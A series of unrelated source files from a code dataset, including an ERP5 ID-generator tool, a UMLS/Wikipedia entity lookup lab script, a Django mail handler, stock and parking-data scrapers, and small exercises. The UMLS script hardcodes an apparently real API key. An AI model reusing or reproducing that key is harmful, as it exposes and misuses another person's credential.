**kw)\n\n  def _get_id(self, id):\n    \"\"\"\n      _get_id is overridden to not use generateNewId\n      It is used for example when an object is cloned\n    \"\"\"\n    if self._getOb(id, None) is None :\n      return id\n    return self._generateNextId()\n\n  @caching_instance_method(id='IdTool._getLatestIdGenerator',\n    cache_factory='erp5_content_long')\n  def _getLatestIdGenerator(self, reference):\n    \"\"\"\n      Tries to find the id_generator with the latest version\n      from the current object.\n      Uses low-level access to allow creating a site without a catalog\n    \"\"\"\n    assert reference\n    id_last_generator = None\n    version_last_generator = 0\n    for generator in self.objectValues():\n      if generator.getReference() == reference:\n        # Version Property Sheet defines 'version' property as a 'string'\n        version = int(generator.getVersion())\n        if version > version_last_generator:\n          id_last_generator = generator.getId()\n          version_last_generator = version\n    if 
id_last_generator is None:\n      raise KeyError(repr(reference))\n    return id_last_generator\n\n  def _getLatestGeneratorValue(self, id_generator):\n    \"\"\"\n      Return the latest generator with the given reference\n    \"\"\"\n    return self._getOb(self._getLatestIdGenerator(id_generator))\n\n  security.declareProtected(Permissions.AccessContentsInformation,\n                            'generateNewId')\n  def generateNewId(self, id_group=None, default=None, method=_marker,\n                    id_generator=None, poison=False):\n    \"\"\"\n      Generate the next id in the sequence of ids of a particular group\n    \"\"\"\n    if id_group in (None, 'None'):\n      raise ValueError('%r is not a valid id_group' % id_group)\n    # for compatibility with sql data, must not use id_group as a list\n    if not isinstance(id_group, str):\n      id_group = repr(id_group)\n      warnings.warn('id_group must be a string, other types '\n                    'are deprecated.', DeprecationWarning)\n    if id_generator is None:\n      id_generator = 'document'\n    if method is not _marker:\n      warnings.warn(\"Use of 'method' argument is deprecated\", DeprecationWarning)\n    try:\n      #use _getLatestGeneratorValue here so that the technical level\n      #does not call the method\n      last_generator = self._getLatestGeneratorValue(id_generator)\n      new_id = last_generator.generateNewId(\n        id_group=id_group,\n        default=default,\n        poison=poison,\n      )\n    except KeyError:\n      # XXX backward compatibility\n      if self.getTypeInfo():\n        LOG('generateNewId', ERROR, 'while generating id')\n        raise\n      else:\n        # Compatibility code below, in case the last version of erp5_core\n        # is not installed yet\n        warnings.warn(\"You are using an old version of erp5_core to generate\"\n                      \"ids.\\nPlease update erp5_core business template to \"\n                      \"use new id generators\", DeprecationWarning)\n        dict_ids = getattr(aq_base(self), 'dict_ids', None)\n        if dict_ids is None:\n          dict_ids = self.dict_ids = PersistentMapping()\n        new_id = None\n        # Getting the last id\n        if default is None:\n          default = 0\n        marker = []\n        new_id = dict_ids.get(id_group, marker)\n        if method is _marker:\n          if new_id is marker:\n            new_id = default\n          else:\n            new_id = new_id + 1\n        else:\n          if new_id is marker:\n            new_id = default\n          new_id = method(new_id)\n        # Store the new value\n        dict_ids[id_group] = new_id\n    return new_id\n\n  security.declareProtected(Permissions.AccessContentsInformation,\n                            'generateNewIdList')\n  def generateNewIdList(self, id_group=None, id_count=1, default=None,\n                        store=_marker, id_generator=None, poison=False):\n    \"\"\"\n      Generate a list of next ids in the sequence of ids of a particular group\n    \"\"\"\n    if id_group in (None, 'None'):\n      raise ValueError('%r is not a valid id_group' % id_group)\n    # for compatibility with sql data, must not use id_group as a list\n    if not isinstance(id_group, str):\n      id_group = repr(id_group)\n      warnings.warn('id_group must be a string, other types '\n                    'are deprecated.', DeprecationWarning)\n    if id_generator is None:\n      id_generator = 'uid'\n    if store is not _marker:\n      warnings.warn(\"Use of 'store' argument is deprecated.\",\n                    DeprecationWarning)\n    try:\n      #use _getLatestGeneratorValue here so that the technical level\n      #does not call the method\n      last_generator = self._getLatestGeneratorValue(id_generator)\n      new_id_list = last_generator.generateNewIdList(id_group=id_group,\n          id_count=id_count, default=default, poison=poison)\n    except (KeyError, ValueError):\n      # XXX backward compatibility\n      if self.getTypeInfo():\n        LOG('generateNewIdList', ERROR, 'while generating id')\n        raise\n      else:\n        # Compatibility code below, in case the last version of erp5_core\n        # is not installed yet\n        
warnings.warn(\"You are using an old version of erp5_core to generate\"\n                      \"ids.\\nPlease update erp5_core business template to \"\n                      \"use new id generators\", DeprecationWarning)\n        new_id = None\n        if default is None:\n          default = 1\n        # XXX It's temporary, a New API will be implemented soon\n        #     the code will be changed\n        portal = self.getPortalObject()\n        try:\n          query = portal.IdTool_zGenerateId\n          commit = portal.IdTool_zCommit\n        except AttributeError:\n          portal_catalog = portal.portal_catalog.getSQLCatalog()\n          query = portal_catalog.z_portal_ids_generate_id\n          commit = portal_catalog.z_portal_ids_commit\n        try:\n          result = query(id_group=id_group, id_count=id_count, default=default)\n        finally:\n          commit()\n        new_id = result[0]['LAST_INSERT_ID()']\n        if store:\n          if getattr(aq_base(self), 'dict_length_ids', None) is None:\n            # Length objects are stored in a persistent mapping: there is one\n            # Length object per id_group.\n            self.dict_length_ids = PersistentMapping()\n          if self.dict_length_ids.get(id_group) is None:\n            self.dict_length_ids[id_group] = Length(new_id)\n          self.dict_length_ids[id_group].set(new_id)\n        if six.PY2:\n          new_id_list = range(new_id - id_count, new_id)\n        else:\n          new_id_list = list(range(new_id - id_count, new_id))\n    return new_id_list\n\n  security.declareProtected(Permissions.ModifyPortalContent,\n                            'initializeGenerator')\n  def initializeGenerator(self, id_generator=None, all=False):\n    \"\"\"\n    Initialize generators. This is mostly used when a new ERP5 site\n    is created. Some generators will need to do some initialization like\n    creating SQL Database, preparing some data in ZODB, etc\n    \"\"\"\n    if not all:\n      #Use _getLatestGeneratorValue here so that the technical level\n      #does not call the method\n      last_generator = self._getLatestGeneratorValue(id_generator)\n      last_generator.initializeGenerator()\n    else:\n      # recover all the generators and initialize them\n      for generator in self.objectValues(\\\n          portal_type='Application Id Generator'):\n        generator.initializeGenerator()\n\n  security.declareProtected(Permissions.ModifyPortalContent,\n                            'clearGenerator')\n  def clearGenerator(self, id_generator=None, all=False):\n    \"\"\"\n    Clear generators data. This can be useful when working on a\n    development instance or in some other rare cases. 
This will\n      lose data and must be used with caution\n\n      This can be incompatible with some particular generator implementations;\n      in this case a particular error will be raised (to be determined and\n      added here)\n    \"\"\"\n    if not all:\n      #Use _getLatestGeneratorValue here so that the technical level\n      #does not have to call the method\n      last_generator = self._getLatestGeneratorValue(id_generator)\n      last_generator.clearGenerator()\n\n    else:\n      if len(self.objectValues()) == 0:\n        # compatibility with old API\n        self.getPortalObject().IdTool_zDropTable()\n        self.getPortalObject().IdTool_zCreateTable()\n      for generator in self.objectValues(\\\n          portal_type='Application Id Generator'):\n        generator.clearGenerator()\n\n  ## XXX Old API deprecated\n  #backward compatibility\n  security.declareProtected(Permissions.AccessContentsInformation,\n                            'generateNewLengthIdList')\n  generateNewLengthIdList = generateNewIdList\n\n  security.declareProtected(Permissions.AccessContentsInformation,\n                            'getLastLengthGeneratedId')\n  def getLastLengthGeneratedId(self, id_group, default=None):\n    \"\"\"\n      Get the last length id generated\n    \"\"\"\n    warnings.warn('getLastLengthGeneratedId is deprecated',\n                   DeprecationWarning)\n    # check in persistent mapping if exists\n    if getattr(aq_base(self), 'dict_length_ids', None) is not None:\n      last_id = self.dict_length_ids.get(id_group)\n      if last_id is not None:\n        return last_id.value - 1\n    # otherwise check in mysql\n    # XXX It's temporary, a new API will be implemented soon\n    # and the code will be changed\n    portal = self.getPortalObject()\n    try:\n      query = portal.IdTool_zGetLastId\n    except AttributeError:\n      query = portal.portal_catalog.getSQLCatalog().z_portal_ids_get_last_id\n    result = query(id_group=id_group)\n    if len(result):\n      try:\n        return result[0]['last_id']\n      except KeyError:\n        return result[0]['LAST_INSERT_ID()']\n    return default\n\n  security.declareProtected(Permissions.AccessContentsInformation,\n                            'getLastGeneratedId')\n  def getLastGeneratedId(self, id_group=None, default=None):\n    \"\"\"\n      Get the last id generated\n    \"\"\"\n    warnings.warn('getLastGeneratedId is deprecated', DeprecationWarning)\n    if getattr(aq_base(self), 'dict_ids', None) is None:\n      self.dict_ids = PersistentMapping()\n    last_id = None\n    if id_group is not None and id_group != 'None':\n      last_id = self.dict_ids.get(id_group, default)\n    return last_id\n\n  security.declareProtected(Permissions.ModifyPortalContent,\n                            'setLastGeneratedId')\n  def setLastGeneratedId(self, new_id, id_group=None):\n    \"\"\"\n      Set a new last id. This is useful in order to reset\n      a sequence of ids.\n    \"\"\"\n    if getattr(aq_base(self), 'dict_ids', None) is None:\n      self.dict_ids = PersistentMapping()\n    if id_group is not None and id_group != 'None':\n      self.dict_ids[id_group] = new_id\n\n  security.declareProtected(Permissions.AccessContentsInformation,\n                            'generateNewLengthId')\n  def generateNewLengthId(self, id_group=None, default=None, store=_marker):\n    \"\"\"Generates an Id using a conflict-free id generator. 
Deprecated.\n    \"\"\"\n    warnings.warn('generateNewLengthId is deprecated.\\n'\n                  'Use generateNewIdList with a sql id_generator',\n                  DeprecationWarning)\n    if store is not _marker:\n      return self.generateNewIdList(id_group=id_group,\n              id_count=1, default=default, store=store)[0]\n    return self.generateNewIdList(id_group=id_group,\n            id_count=1, default=default)[0]\n\n  security.declareProtected(Permissions.AccessContentsInformation,\n                            'getDictLengthIdsItems')\n  def getDictLengthIdsItems(self):\n    \"\"\"\n      Return a copy of dict_length_ids.\n      This is a workaround to access the persistent mapping content from a ZSQL\n      method, to be able to insert initial tuples in the database at creation.\n    \"\"\"\n    if getattr(self, 'dict_length_ids', None) is None:\n      self.dict_length_ids = PersistentMapping()\n    return self.dict_length_ids.items()\n\n  security.declarePrivate('dumpDictLengthIdsItems')\n  def dumpDictLengthIdsItems(self):\n    \"\"\"\n      Persistently store data from the SQL table portal_ids.\n    \"\"\"\n    portal_catalog = getattr(self, 'portal_catalog').getSQLCatalog()\n    query = getattr(portal_catalog, 'z_portal_ids_dump')\n    dict_length_ids = getattr(aq_base(self), 'dict_length_ids', None)\n    if dict_length_ids is None:\n      dict_length_ids = self.dict_length_ids = PersistentMapping()\n    for line in query().dictionaries():\n      id_group = line['id_group']\n      last_id = line['last_id']\n      stored_last_id = self.dict_length_ids.get(id_group)\n      if stored_last_id is None:\n        self.dict_length_ids[id_group] = Length(last_id)\n      else:\n        stored_last_id_value = stored_last_id()\n        if stored_last_id_value < last_id:\n          stored_last_id.set(last_id)\n        else:\n          if stored_last_id_value > last_id:\n            LOG('IdTool', WARNING, 'ZODB value (%r) for group %r is higher ' \\\n                'than SQL value (%r). Keeping ZODB value untouched.' 
% \\\n (stored_last_id, id_group, last_id))\n\nInitializeClass(IdTool)\n","repo_name":"Nexedi/erp5","sub_path":"product/ERP5/Tool/IdTool.py","file_name":"IdTool.py","file_ext":"py","file_size_in_byte":14445,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"26961107981","text":"#import des packages \nimport json\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.types import *\nfrom datetime import datetime\nsqlContext=SQLContext(sc)\n\ndef convertJsonList(string):\n data=json.loads(string)\n return [data[key] for key in data.keys()]\n\ndef convertDate(string):\n return datetime.strptime(string.strip(),\"%d/%m/%Y\").date()\n\n\nschema=StructType([\n (StructField(\"name\",StringType(),True)),\n\t (StructField(\"age\",IntegerType(),True)),\n\t (StructField(\"date\",DateType(),True)),\n (StructField(\"three\",StringType(),True)),\n (StructField(\"two\",StringType(),True)),\n (StructField(\"one\",StringType(),True))\n ])\n\nfile=sc.textFile(\"examples/src/main/resources/people.txt\")\n\nparts=file.map(lambda line:line.split(\";\"))\n\ndata=parts.map(lambda line:[line[0],line[1].strip(),line[2],convertJsonList(line[3])])\n\naxa=data.map(lambda line:(line[0],int(line[1]),convertDate(line[2]),line[3][0],line[3][1],line[3][2]))\n\ndf=sqlContext.createDataFrame(axa,schema)\n\ndf.show()\n\n\n","repo_name":"ocamara/HandleSparkWithScala","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1776859849","text":"# lab3 python file\r\n# importing necessary packages for lab3\r\nimport spacy\r\nimport json\r\nfrom Authentication import *\r\nfrom pathlib import Path\r\nimport wikipedia\r\nimport webbrowser\r\n\r\n\r\n# use Spacy and SciSpacy to identify entities in the \"entire\" text (not just HPI)\r\n# use SciSpacy model \"en_ner_bc5cdr_md\"\r\ndef entities(wname, rname):\r\n\r\n with open(rname) as r:\r\n with open(wname, \"w\") as w:\r\n path = Path().absolute()\r\n print(\" Analyzing with SciSpacy Model...\")\r\n content = r.read()\r\n nlp = spacy.load(\"en_ner_bc5cdr_md\")\r\n doc = nlp(content)\r\n entityList = []\r\n w.write(\"Spacy Entity List\\n\")\r\n for word in doc.ents:\r\n entityList.append((str(word)))\r\n entityList = list(dict.fromkeys(entityList))\r\n result = []\r\n marker = set()\r\n for l in entityList:\r\n ll = l.lower()\r\n if ll not in marker:\r\n marker.add(ll)\r\n result.append(l)\r\n for entity in result:\r\n w.write(entity + \"\\n\")\r\n print(\"Saved Spacy Entities to file \" + str(path.as_posix()) + \"/\" + wname)\r\n return result\r\n\r\n\r\n# use UMLS UTS for each entity and for those that are UMLS concepts, identify which are\r\n# diseases/syndromes by using the UMLS concept's semantic type. To do this, you will use the /search end\r\n# point to retrieve CUIs for those entities that are UMLS concepts. For each of these, then use the\r\n# /content/current/CUI?{CUI}\r\n# 2. 
For each Spacy identified \"entity\", fetch the following from the UMLS:\r\n# CUI | Term | Source Terminology.\r\ndef get_ulms_info(string):\r\n apikey = \"69d2ad47-8307-4f4c-b0aa-dfa5fbeae47e\"\r\n version = \"current\"\r\n uri = \"https://uts-ws.nlm.nih.gov\"\r\n content_endpoint = \"/rest/search/\" + version\r\n # get at ticket granting ticket for the session\r\n AuthClient = Authentication(apikey)\r\n tgt = AuthClient.gettgt()\r\n pageNumber = 0\r\n # generate a new service ticket for each page if needed\r\n ticket = AuthClient.getst(tgt)\r\n pageNumber += 1\r\n # construct the RESTful API command variable\r\n query = {'string': string, 'ticket': ticket, 'pageNumber': pageNumber}\r\n query['searchType'] = \"exact\"\r\n query['sabs'] = \"SNOMEDCT_US\"\r\n r = requests.get(uri + content_endpoint, params=query)\r\n r.encoding = 'utf-8'\r\n items = json.loads(r.text)\r\n jsonData = items[\"result\"]\r\n return jsonData\r\n\r\n\r\ndef semantic_type(CUI):\r\n jsonData = []\r\n apikey = \"69d2ad47-8307-4f4c-b0aa-dfa5fbeae47e\"\r\n uri = \"https://uts-ws.nlm.nih.gov\"\r\n content_endpoint = \"/rest/content/current/CUI/\"\r\n # get at ticket granting ticket for the session\r\n AuthClient = Authentication(apikey)\r\n tgt = AuthClient.gettgt()\r\n # generate a new service ticket for each page if needed\r\n ticket = AuthClient.getst(tgt)\r\n # construct the RESTful API command variable\r\n query = {'ticket': ticket}\r\n r = requests.get(uri + content_endpoint + CUI, params=query)\r\n r.encoding = 'utf-8'\r\n items = json.loads(r.text)\r\n for i in range(len(items[\"result\"][\"semanticTypes\"])):\r\n jsonData.append(items[\"result\"][\"semanticTypes\"][i][\"name\"])\r\n return jsonData\r\n\r\n\r\ndef umls_semantic(entities, wname):\r\n with open(wname, \"w\") as w:\r\n path = Path().absolute()\r\n print(\" Retrieving UMLS info for matches...\")\r\n entity_list = []\r\n for entity in entities:\r\n umls_data = get_ulms_info(entity)\r\n for result in umls_data[\"results\"]:\r\n print(entity)\r\n if umls_data[\"results\"][0][\"ui\"] != \"NONE\":\r\n print(result[\"ui\"] + \"|\" + result[\"name\"] + \"|\" + result[\"rootSource\"])\r\n w.write(result[\"ui\"] + \"|\" + result[\"name\"] + \"|\" + result[\"rootSource\"] + \"\\n\")\r\n for semanticType in semantic_type(result[\"ui\"]):\r\n if semanticType == \"Disease or Syndrome\":\r\n entity_list.append(entity)\r\n print(\" Disease or Syndrome - found\")\r\n w.write(\" Disease or Syndrome - found\\n\")\r\n else:\r\n print(\" \" + semanticType)\r\n w.write(\" \" + semanticType + \"\\n\")\r\n entity_list = list(dict.fromkeys(entity_list))\r\n print(\"Saved UMLS Concepts to file \" + str(path.as_posix()) + \"/\" + wname)\r\n print(\"List of diseases/syndromes, duplicates removed\")\r\n print(entity_list)\r\n return entity_list\r\n\r\n\r\n# For each of the disease/syndrome items, obtain the Wikipedia summary information and open the Wikipedia web page.\r\n# For each of the concepts that are \"Disease or Syndrome\", obtain information from Wikipedia using the Wikipedia API.\r\n# Write the Wikipedia entry's 'summary' to a .txt file named for the drug and launch the default desktop web browser\r\n# to access the relevant Wikipedia page.\r\ndef getWikiSummary (entity_list):\r\n print(\" Retrieving Wikipedia entries for:\\n Writing Wikipedia info to files and opening browser pages...\")\r\n print(str(Path().absolute().as_posix()))\r\n for entity in entity_list:\r\n with open('{}.txt'.format(entity), \"w\", encoding=\"utf-8\") as w:\r\n wikiSummary = 
wikipedia.summary(entity, auto_suggest=False)\r\n            page = wikipedia.page(entity,auto_suggest=False).url\r\n            print(wikiSummary)\r\n            w.write(wikiSummary)\r\n            webbrowser.open_new_tab(page)\r\n\r\n\r\nrfile = \"L3.csv\"\r\nwfile = \"SpacyEntities.txt\"\r\nentityList = entities(wfile, rfile)\r\nwfile2 = \"UMLS_Concepts.txt\"\r\numls = umls_semantic(entityList, wfile2)\r\ngetWikiSummary(umls)\r\nprint('Done!')","repo_name":"justinslee30/MED277","sub_path":"L3/Lab3.py","file_name":"Lab3.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"72602946802","text":"from django.contrib import messages\nfrom django.shortcuts import redirect\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n\ndef mailSubmit(request):\n\n    if request.method == \"POST\":\n        name= request.POST.get('name')\n        companyName= request.POST.get('companyName')\n        telephone= request.POST.get('telephone')\n        email= request.POST.get('email')\n        message= request.POST.get('message')\n        text=f\"Yeni başvuru bilgileri adı: {name} şirket ismi: {companyName} telefon numarası: {telephone} eposta adresi: {email} messagı: {message}\"\n        title='Yeni Başvuru Var!'\n        hostEmail = settings.EMAIL_HOST_USER\n        sendTo='shamsadinlo@gmail.com'\n\n        try:\n            send_mail(title, text, hostEmail ,[sendTo],fail_silently=False)\n            messages.info(request, 'Mesajiniz başarılı bir şekilde gönderildi!')\n        except:\n            messages.error(request, 'Bir hata oluştu lütfen tekrar deneyiniz!')\n","repo_name":"berkansems/our_website","sub_path":"s4in/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"3533505248","text":"\n\n# with open('aula30.txt', 'w') as arquivo:\n#     ...\n\nclass MyOpen:\n\n    def __init__(self, caminho_arquivo, modo):\n        print('INIT')\n        self.caminho_arquivo = caminho_arquivo\n        self.modo = modo\n        self._arquivo = None\n\n    def __enter__(self):\n        print('Abrindo arquivo')\n        self._arquivo = open(self.caminho_arquivo, self.modo, encoding='utf8')\n        return self._arquivo\n\n    def __exit__(self, class_exception, exception_, traceback_):\n        print('Fechando arquivo')\n        self._arquivo.close()\n\n        raise class_exception(*exception_.args)\n\n        print(class_exception)\n        print(exception_)\n        print(traceback_)\n\n        return True\n\n\ninstancia = MyOpen('aula30.txt', 'w')\nwith instancia as arquivo:\n    arquivo.write('Line 1\\n')\n    arquivo.write('Line 2\\n', 123)\n    arquivo.write('Line 3\\n')\n    print('WITH', arquivo)\n","repo_name":"nathangazon/Section5OrientacaoObjetos","sub_path":"aula30.py","file_name":"aula30.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"30532193275","text":"# needed for python unit testing\n# https://docs.python.org/3/library/unittest.html\nimport unittest\n\n# required for type hinting\n# https://mypy.readthedocs.io/en/stable/cheat_sheet_py3.html\nfrom typing import List, Dict, Set, Optional\n\nclass Solution:\n    '''\n    Given an array asteroids of integers representing asteroids in a row.\n\n    For each asteroid, the absolute value represents its size, and the sign\n    represents its direction (positive meaning right, negative left). Each\n    asteroid moves at the same speed.\n\n    Find out the state of the asteroids after all collisions. If two asteroids\n    meet, the smaller one will explode. 
If both are the same size, both will\n    explode. Two asteroids moving in the same direction will never meet.\n    '''\n    def asteroidCollision(self, asteroids: List[int]) -> List[int]:\n        answer = []\n        stack = []\n        for a in asteroids:\n            if a > 0:\n                stack.append(a)\n            else:\n                a = abs(a)\n                while stack and stack[-1] < a:\n                    stack.pop()\n                if stack and stack[-1] == a:\n                    stack.pop()\n                elif len(stack) == 0:\n                    answer.append(-a)\n        return answer + stack\n\nclass UnitTesting(unittest.TestCase):\n    def test_one(self):\n        s = Solution()\n        i = [5,10,-5]\n        o = [5,10]\n        self.assertEqual(s.asteroidCollision(i), o)\n\n    def test_two(self):\n        s = Solution()\n        i = [8,-8]\n        o = []\n        self.assertEqual(s.asteroidCollision(i), o)\n\n    def test_three(self):\n        s = Solution()\n        i = [10,2,-5]\n        o = [10]\n        self.assertEqual(s.asteroidCollision(i), o)\n\nif __name__ == '__main__':\n    unittest.main(verbosity=2)","repo_name":"olsenw/LeetCodeExercises","sub_path":"Python3/asteroid_collision.py","file_name":"asteroid_collision.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"35888991952","text":"import requests\nimport pandas\nfrom io import StringIO\n\nimport db_connect\n\n\nclass stock_transaction:\n    \"\"\"Fetch daily per-stock trading data\n    * Source: https://data.gov.tw/dataset/11549\n    * Name: after-hours information > daily trading data per stock\n    * Update frequency: daily\n    * Main fields: security code, security name, shares traded, trade value, opening price, highest price, lowest price, closing price, price spread, number of transactions\n    e.g. \"00875\",\"國泰網路資安\",\n    \"1,998,885\",\"51,736,728\",\"25.78\",\"25.98\",\"25.77\",\"25.98\",\n    \"+0.46\",\"484\"\n    \"\"\"\n\n    def __init__(self) -> None:\n        self.title = \"盤後資訊 > 個股日成交資訊\"\n        self.url = (\n            \"http://www.twse.com.tw/exchangeReport/STOCK_DAY_ALL?response=open_data\"\n        )\n        self.df = None  # dataframe built from the csv data\n        self.trade_date = \"2021-1-1\"  # trade date\n\n    def _create_new_header(self, orignal_headers):\n        new_headers = []\n\n        for data in orignal_headers:\n            if data == \"證券代號\":\n                new_headers.append(\"stock_symbol\")\n            elif data == \"證券名稱\":\n                new_headers.append(\"stock_name\")\n            elif data == \"成交股數\":\n                new_headers.append(\"volume\")\n            elif data == \"成交金額\":\n                new_headers.append(\"total_price\")\n            elif data == \"開盤價\":\n                new_headers.append(\"open\")\n            elif data == \"最高價\":\n                new_headers.append(\"high\")\n            elif data == \"最低價\":\n                new_headers.append(\"low\")\n            elif data == \"收盤價\":\n                new_headers.append(\"close\")\n            elif data == \"漲跌價差\":\n                new_headers.append(\"spread\")\n            elif data == \"成交筆數\":\n                new_headers.append(\"transactions_number\")\n\n        return new_headers\n\n    def _get_and_set_df_data(self, url=None) -> bool:\n        \"\"\"Fetch the data inside the CSV, convert it to a DataFrame, and return whether it succeeded.\n\n        Args:\n            param1 (str): url of the data\n        Returns:\n            bool: the result. True means the fetch succeeded, False means the fetch or the conversion failed.\n\n        \"\"\"\n        if url:\n            self.url = url\n\n        try:\n            csv = requests.get(self.url)\n            df = pandas.read_csv(StringIO(csv.text))  # has a header row\n            # print(df) # debug\n            self.df = df\n            # get the date from the file name, e.g. STOCK_DAY_ALL_20210924.csv\n            trade_date_raw = csv.headers.get(\"Content-Disposition\")[-13:-5]\n            self.trade_date = (\n                f\"{trade_date_raw[:4]}-{trade_date_raw[4:6]}-{trade_date_raw[6:]}\"\n            )\n        except Exception as exc:\n            print(exc)\n            return False\n\n        return True\n\n    def _insert_mysql(self) -> bool:\n        \"\"\"Insert data into MySQL.\n\n        Returns:\n            bool: the result. 
True means the save succeeded, False means the save failed.\n\n        \"\"\"\n\n        try:\n            new_headers = self._create_new_header(self.df.columns)\n            # df = self.df[1:]  # drop the first row  # this was wrong, the first row must be kept\n            df = self.df\n            df.columns = new_headers  # set the column names\n            print(f\"{df}\\n==={self.trade_date}===\")\n\n            counter = 0  # count of rows to insert\n            # create the connection object\n            my_connt_obj = db_connect.mysql_connect()\n            conn = my_connt_obj.connect()\n            with conn.cursor() as cursor:\n                now = self.trade_date\n\n                # INSERT SQL statement\n                for _, row in df.iterrows():\n                    try:\n                        cmd = \"\"\"INSERT IGNORE INTO DailyPrice \n                        (StockID, Symbol, TradeDate, OpenPrice, HighPrice,\n                        LowPrice, ClosePrice, Volumn)\n                        values(%s,%s,%s,%s,%s,%s,%s,%s);\"\"\"\n                        cursor.execute(\n                            cmd,\n                            (\n                                None,\n                                row.stock_symbol,\n                                now,\n                                row.open if pandas.notnull(row.open) else 0,\n                                row.high if pandas.notnull(row.high) else 0,\n                                row.low if pandas.notnull(row.low) else 0,\n                                row.close if pandas.notnull(row.close) else 0,\n                                row.volume if pandas.notnull(row.volume) else 0,\n                            ),\n                        )\n                        conn.commit()\n                        counter += 1\n                    except Exception as e:\n                        print(e)\n        except Exception as exc:\n            print(exc)\n            return False\n\n        print(f\"===Finish: {self.title}==\")\n        return True\n\n    def get_and_save(self, url=None):\n        \"\"\"Get today's transaction data and save it into MySQL.\n\n        Args:\n            param1 (str): url of the data\n        Returns:\n            bool: the result. True means the data was saved, False means nothing was saved to the database\n\n        \"\"\"\n        r = self._get_and_set_df_data(url)\n        if r:\n            r = self._insert_mysql()\n        else:\n            return False\n\n        return r\n\n\n\"\"\"Implementation test\"\"\"\n# test = stock_transaction()\n# r = test.get_and_save()\n# print(r)\n","repo_name":"eyelash94500/python_fin_azure","sub_path":"code/ch5/stock_transaction.py","file_name":"stock_transaction.py","file_ext":"py","file_size_in_byte":5425,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"75"}
{"seq_id":"30426699549","text":"import re\nimport json\nimport warnings\n\nfrom util import DataSource\n\ntry:\n    from .bahn_credentials import BAHN_API_TOKEN\nexcept ImportError:\n    warnings.warn(\"Deutsche Bahn Parking API disabled! 
You need to define your BAHN_API_TOKEN in bahn_credentials.py\")\n    BAHN_API_TOKEN = None\n\n\nif BAHN_API_TOKEN:\n    class ParkingBahn(DataSource):\n\n        source_id = \"bahn-api-parken\"\n        web_url = \"https://api.deutschebahn.com/bahnpark/v1/spaces/occupancies\"\n\n        def download_meta_data(self):\n            self.session.headers.update({\n                \"Accept\": \"application/json;charset=utf-8\",\n                \"Authorization\": f\"Bearer {BAHN_API_TOKEN}\"\n            })\n            markup = self.get_url(self.web_url)\n            data = json.loads(markup)\n\n            return data\n\n        def download_snapshot_data(self):\n            data = self.download_meta_data()\n\n            parking_places = []\n            for entry in data[\"allocations\"]:\n                num_cur = None\n                text = entry[\"allocation\"].get(\"text\")\n                if text:\n                    num_cur = self.int_or_none(text.split()[-1])\n                parking_places.append({\n                    \"place_name\": entry[\"space\"][\"name\"],\n                    \"num_all\": entry[\"allocation\"].get(\"capacity\"),\n                    \"num_free\": num_cur,\n\n                })\n            return parking_places\n\n        def transform_snapshot_data(self, data):\n            ret_data = []\n\n            text_mapping = {\n                \"bis 10\": 10,\n                \"> 10\": 20,\n                \"> 30\": 40,\n                \"> 50\": 60,\n            }\n\n            try:\n                data[\"allocations\"]\n            except (AttributeError, KeyError, TypeError) as e:\n                return ret_data\n\n            for entry in data[\"allocations\"]:\n                num_cur = None\n                text = entry[\"allocation\"].get(\"text\")\n                if text:\n                    num_cur = text_mapping.get(text)\n                    if num_cur is None:\n                        num_cur = self.int_or_none(text.split()[-1])\n\n                ret_data.append({\n                    \"place_id\": self.place_name_to_id(entry[\"space\"][\"id\"]),\n                    \"num_all\": entry[\"allocation\"].get(\"capacity\"),\n                    \"num_free\": num_cur,\n                })\n\n            return ret_data\n\n        def transform_meta_data(self, data):\n            ret_data = super().transform_meta_data(None)\n            try:\n                data[\"allocations\"]\n            except (AttributeError, KeyError, TypeError) as e:\n                return ret_data\n\n            for entry in data[\"allocations\"]:\n                place_id = self.place_name_to_id(entry[\"space\"][\"id\"])\n                place_name = entry.get(\"station\", {}).get(\"nameDisplay\") or entry[\"space\"][\"name\"]\n\n                city_name = []\n                title_l = entry[\"space\"][\"title\"].split()\n                while title_l:\n                    if title_l[0].startswith(\"P\") and title_l[0][1].isdigit():\n                        break\n                    city_part = title_l.pop(0)\n                    if city_part not in (\"Hbf\", \"Südkreuz\") and \"bahnhof\" not in city_part:\n                        city_name.append(city_part)\n                city_name = \" \".join(city_name)\n\n                ret_data[\"places\"][place_id] = {\n                    \"place_id\": place_id,\n                    \"place_name\": place_name,\n                    \"num_all\": entry[\"allocation\"].get(\"capacity\"),\n                    \"city_name\": city_name,\n                }\n\n            return ret_data\n","repo_name":"defgsus/parking-scraper","sub_path":"sources/bahn.py","file_name":"bahn.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"}
{"seq_id":"38510136096","text":"import click\nfrom loguru import logger\n\nfrom wtb.classification.bird_classifier import BirdClassifier\n\n\n@click.command()\n@click.option(\"--image_path\", type=click.Path(exists=True))\n@click.option(\"--model_path\", type=click.Path(exists=True))\ndef predict(image_path: str, model_path: str):\n    model = BirdClassifier.load_classifier(model_path)\n    prediction = model.predict(image_path)\n\n    logger.info(prediction)\n    logger.info(model.get_human_prediction(prediction))\n\n\nif __name__ == \"__main__\":\n    
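# Example CLI call; the file paths are placeholders, not files from this repo:\n    #   python predict.py --image_path bird.jpg --model_path model.pkl\n    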
predict()\r\n","repo_name":"bigbrother-birdhouse/bird-classification","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
